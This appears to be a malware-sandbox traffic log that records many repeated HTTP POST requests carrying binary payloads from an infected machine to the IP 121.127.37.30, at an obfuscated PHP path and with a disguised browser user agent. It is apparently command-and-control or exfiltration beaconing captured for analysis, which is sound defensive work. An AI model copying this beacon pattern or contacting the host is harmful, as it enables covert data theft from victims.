                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1412Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2560Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1452Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 1424Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 121.127.37.30Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
